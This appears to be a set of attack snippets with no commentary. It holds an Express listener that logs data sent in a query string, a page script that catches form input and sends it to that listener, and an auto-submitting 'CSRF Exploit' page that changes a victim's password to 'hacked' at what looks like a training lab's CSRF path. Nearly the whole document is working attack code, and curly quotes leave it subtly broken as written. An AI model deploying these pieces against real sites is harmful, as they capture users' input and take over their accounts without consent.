const express = require(‘express’); const app = express(); const port = 3000; app.get(‘/log’, (req, res) => { const receivedData = req.query.data; if (receivedData) { console.log(`URL received: ${req.protocol}://${req.get(‘host’)}${req.originalUrl}`); console.log(`Data received: ${receivedData}`); } else { console.log(‘URL received, but data is undefined’); } res.sendStatus(200); }); app.listen(port, () => { console.log(`Listening server running at http://localhost:${port}`); });
<script> function sendData(data) { var xhr = new XMLHttpRequest(); xhr.open(‘GET’, ‘http://localhost:3000/log?data=’ + encodeURIComponent(data), true); xhr.send(); } document.querySelector(‘input[type=”submit”]’).addEventListener(‘click’, function(e) { e.preventDefault(); var userInput = document.querySelector(‘input[type=”text”]’).value; sendData(userInput); }); </script>
<!DOCTYPE html> <html> <head> <title>CSRF Exploit</title> <script> function submitForm() { document.getElementById(‘exploit-form’).submit(); } </script> </head> <body onload=”submitForm()”> <form id=”exploit-form” action=”http://<IP_Address>/vulnerabilities/csrf/” method=”POST”> <input type=”hidden” name=”password_new” value=”hacked” /> <input type=”hidden” name=”password_conf” value=”hacked” /> <input type=”hidden” name=”Change” value=”Change” /> </form> </body> </html>